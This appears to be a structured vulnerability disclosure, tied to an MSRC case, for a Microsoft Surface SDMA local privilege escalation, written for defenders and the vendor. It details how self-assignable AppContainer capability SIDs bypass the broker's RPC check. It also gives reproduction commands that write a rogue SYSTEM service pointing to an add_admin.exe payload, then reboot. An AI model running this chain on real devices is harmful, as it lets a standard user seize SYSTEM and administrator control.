defect: product: "Microsoft Surface Device Management Architecture (SDMA)" vendor: "microsoft.com" type: os cwe: 863 versions: - "SurfaceBroker 6.92.139.0" - "RegistryDm 6.158.139.0" - "WmiDm 6.158.139.0" - "Microsoft.SurfaceHub 75.11130.117.0" presence: behavioural_deterministic os: "Windows 11 Pro build 26100 (Microsoft Surface Laptop 7th Edition)" cvss: "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" bugClass: access_control description: > Two compounding authorization failures in Microsoft SurfaceBroker SDMA allow a standard (non-administrator) local user to escalate to NT AUTHORITY\SYSTEM without UAC prompts or admin prerequisites. The RPC security callback authorizes callers based on self-assignable AppContainer capability SIDs rather than PackageFamilySid. The RegistryDm microservice writes to arbitrary HKLM registry keys as SYSTEM with no path-based authorization. Together, a standard user can create a Windows service in the registry that executes as SYSTEM on reboot. references: - "MSRC Case accepted 2026-02-18" - "https://thecontractor.io/surfacebroker-sdma-lpe/" evidence: - title: "Authentication bypass via self-assignable AppContainer capability SIDs" given: - "Standard (non-admin) user session on a Microsoft Surface device" - "SurfaceExperienceService running as LocalSystem" - "RPC endpoint ncalrpc:[SurfaceBrokerRpc.v2] active" when: - "User creates an AppContainer profile with systemManagement and surfaceDiagnostics capability SIDs using CreateAppContainerProfile()" - "Child process spawned inside the AppContainer binds to the RPC endpoint" - "Child calls ProcessBrokerDataRequest with a well-formed protobuf envelope" then: - "RPC security callback inspects the token, finds both required capability SIDs, and grants ACCESS_LEVEL_USER" - "Standard user has authenticated to a SYSTEM-level broker service using self-assigned credentials" location: type: binary_offset value: "SurfaceBroker.exe — RPC security callback" context: "Security callback checks for capability SIDs S-1-15-3-1024-1023893147-235863880-425656572-4266519675-2590647553-3475379062-430000033-3360374247 (systemManagement) and S-1-15-3-1024-4255513387-3291848077-777312126-3061150041-664064000-1971711331-976518648-1617839858 (surfaceDiagnostics)" reproduction: commands: - "broker_client.exe appcontainer whoami" - "broker_client.exe appcontainer regget SOFTWARE\\Microsoft\\Surface\\Hub DeviceModel" output: | [+] Created new AppContainer profile [+] systemManagement capability SIDs: cap[0]: S-1-15-3-1024-1023893147-235863880-425656572-4266519675-2590647553-3475379062-430000033-3360374247 [+] surfaceDiagnostics capability SIDs: cap[0]: S-1-15-3-1024-4255513387-3291848077-777312126-3061150041-664064000-1971711331-976518648-1617839858 [+] IsAppContainer: YES [+] Return: 0 (0x00000000) - title: "Arbitrary HKLM write via RegistryDm path validation absence" given: - "Authenticated session to SurfaceBroker (via AppContainer capability bypass)" - "RegistryDm microservice UUID d94e201c-708d-4f06-b9c7-95ae86e2c9a5 reachable" when: - "Caller sends SetLocalMachineRegistryRequest with verb UUID 6b11fece-74fd-4199-8645-64f352e73c51" - "Request contains registry key path SYSTEM\\CurrentControlSet\\Services\\SdmaLPE" - "Request contains ImagePath value pointing to attacker-controlled executable" then: - "RegistryDm writes the value to HKLM as SYSTEM without path validation" - "Registry key created under HKLM\\SYSTEM\\CurrentControlSet\\Services\\" - "Standard user has created a Windows service definition that runs as LocalSystem" location: type: function value: "RegistryDm.exe — ProcessRequestInternalAsync → Registry.SetValue()" context: "No allowlist on key path. Caller-supplied path passed directly to Registry.SetValue() running as SYSTEM" reproduction: commands: - "broker_client.exe appcontainer regset SYSTEM\\CurrentControlSet\\Services\\SdmaLPE ImagePath C:\\Users\\Public\\add_admin.exe" - "broker_client.exe appcontainer regsetdw SYSTEM\\CurrentControlSet\\Services\\SdmaLPE Type 16" - "broker_client.exe appcontainer regsetdw SYSTEM\\CurrentControlSet\\Services\\SdmaLPE Start 2" - "broker_client.exe appcontainer regsetdw SYSTEM\\CurrentControlSet\\Services\\SdmaLPE ErrorControl 0" - "broker_client.exe appcontainer regset SYSTEM\\CurrentControlSet\\Services\\SdmaLPE ObjectName LocalSystem" - "reg query HKLM\\SYSTEM\\CurrentControlSet\\Services\\SdmaLPE" - "shutdown /r /t 0" output: | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SdmaLPE ImagePath REG_SZ C:\Users\Public\add_admin.exe Type REG_DWORD 0x10 Start REG_DWORD 0x2 ErrorControl REG_DWORD 0x0 ObjectName REG_SZ LocalSystem - title: "Full chain — standard user to local administrator via SYSTEM service creation" given: - "Standard user session (SID S-1-5-21-*-1005, Medium integrity, no admin group)" - "add_admin.exe payload placed in C:\\Users\\Public\\" - "SurfaceExperienceService running" when: - "User runs sdma_one_click.bat (automates all 8 steps)" - "Batch file creates AppContainer, writes 5 registry values via RegistryDm, triggers reboot" - "On reboot, SCM starts the rogue service as SYSTEM" then: - "add_admin.exe executes as NT AUTHORITY\\SYSTEM" - "New local user created and added to Administrators group" - "Proof written to C:\\Users\\Public\\sdma_proof.txt" - "Standard user can now log in as local administrator" reproduction: commands: - "sdma_one_click.bat SdmaPoC SurfaceLPE!2026" files: - name: "broker_client.exe" hash: "evidence_package" type: "PE32+ executable" - name: "add_admin.exe" hash: "evidence_package" type: "PE32+ executable — SYSTEM service payload" - name: "sdma_one_click.bat" hash: "evidence_package" type: "Batch automation — 8-step exploit chain" - name: "boop.2.mp4" hash: "evidence_package" type: "Video evidence — exploitation recording" - name: "yooo1.mp4" hash: "evidence_package" type: "Video evidence — exploitation recording"